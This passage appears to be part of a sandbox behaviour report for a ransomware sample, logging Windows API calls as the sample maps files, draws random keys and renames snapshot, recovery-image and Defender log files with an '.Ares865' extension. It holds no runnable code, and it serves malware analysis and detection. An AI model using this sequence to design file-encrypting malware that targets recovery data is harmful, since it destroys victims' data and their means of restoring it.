information\\spp\\onlinemetadatacache\\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.330] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3408) returned 1 [0113.330] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.331] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.331] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.331] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1050, lpName=0x0) returned 0x170 [0113.333] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1050) returned 0x190000 [0113.334] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.335] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.335] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.335] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.Ares865") returned 118 [0113.335] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.341] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.341] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3112) returned 1 [0113.341] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.342] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.342] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.342] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf30, lpName=0x0) returned 0x170 [0113.345] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf30) returned 0x190000 [0113.346] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.347] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.347] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.347] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.Ares865") returned 118 [0113.347] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.348] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.348] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3512) returned 1 [0113.349] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.349] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.349] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.350] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10c0, lpName=0x0) returned 0x170 [0113.351] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10c0) returned 0x190000 [0113.352] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.352] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.352] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.353] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.Ares865") returned 118 [0113.353] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{c3f59859-dd84-4710-b6be-740f016ad023}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{c3f59859-dd84-4710-b6be-740f016ad023}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.355] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{c3f59859-dd84-4710-b6be-740f016ad023}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.355] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3608) returned 1 [0113.355] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.356] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.356] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.356] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1120, lpName=0x0) returned 0x170 [0113.357] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1120) returned 0x190000 [0113.358] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.359] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.359] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.361] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.Ares865") returned 118 [0113.361] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.362] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{c4c23d0f-5069-470f-9760-27eb797f66c2}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.362] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1488) returned 1 [0113.362] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.363] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.363] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.363] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8d0, lpName=0x0) returned 0x170 [0113.365] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8d0) returned 0x190000 [0113.366] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.366] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.366] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.367] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.Ares865") returned 118 [0113.367] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.368] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{c861246c-5d84-4ff4-a753-bad4631d65ca}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.368] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3016) returned 1 [0113.368] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.369] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.369] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.369] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xed0, lpName=0x0) returned 0x170 [0113.370] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xed0) returned 0x190000 [0113.371] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.372] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.372] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.373] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.Ares865") returned 118 [0113.373] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.376] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.376] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3608) returned 1 [0113.376] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.377] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.377] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.377] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1120, lpName=0x0) returned 0x170 [0113.379] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1120) returned 0x190000 [0113.381] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.381] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.381] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.382] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.Ares865") returned 118 [0113.382] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{dbab67da-647a-401e-a02b-58c06249c638}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{dbab67da-647a-401e-a02b-58c06249c638}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.383] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{dbab67da-647a-401e-a02b-58c06249c638}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.383] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3304) returned 1 [0113.383] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.384] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.384] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.384] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xff0, lpName=0x0) returned 0x170 [0113.388] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xff0) returned 0x190000 [0113.388] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.389] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.389] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.389] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.Ares865") returned 118 [0113.390] MoveFileExW (lpExistingFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{ee224d27-954d-4040-87c6-066b5517487c}_ondisksnapshotprop"), lpNewFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{ee224d27-954d-4040-87c6-066b5517487c}_ondisksnapshotprop.ares865"), dwFlags=0x1) returned 1 [0113.391] CreateFileW (lpFileName="C:\\System Volume Information\\SPP\\OnlineMetadataCache\\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.Ares865" (normalized: "c:\\system volume information\\spp\\onlinemetadatacache\\{ee224d27-954d-4040-87c6-066b5517487c}_ondisksnapshotprop.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.391] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1352) returned 1 [0113.391] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.392] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x170 [0113.395] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x190000 [0113.395] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.396] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.396] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.397] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.Ares865") returned 65 [0113.397] MoveFileExW (lpExistingFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.Ares865" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.ares865"), dwFlags=0x1) returned 1 [0113.400] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.Ares865" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.401] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3170304) returned 1 [0113.401] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.401] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.402] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.402] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x306300, lpName=0x0) returned 0x170 [0113.403] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x106300) returned 0x3030000 [0113.663] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0113.664] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0113.664] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.683] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.Ares865") returned 66 [0113.683] MoveFileExW (lpExistingFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.Ares865" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.ares865"), dwFlags=0x1) returned 1 [0113.686] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.Ares865" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0113.686] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=169213970) returned 1 [0113.687] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0113.688] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0113.688] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0113.688] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa160320, lpName=0x0) returned 0x170 [0113.690] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xa000000, dwNumberOfBytesToMap=0x160320) returned 0x3030000 [0114.405] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0114.406] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0114.406] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0114.442] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865") returned 83 [0114.442] MoveFileExW (lpExistingFileName="C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log" (normalized: 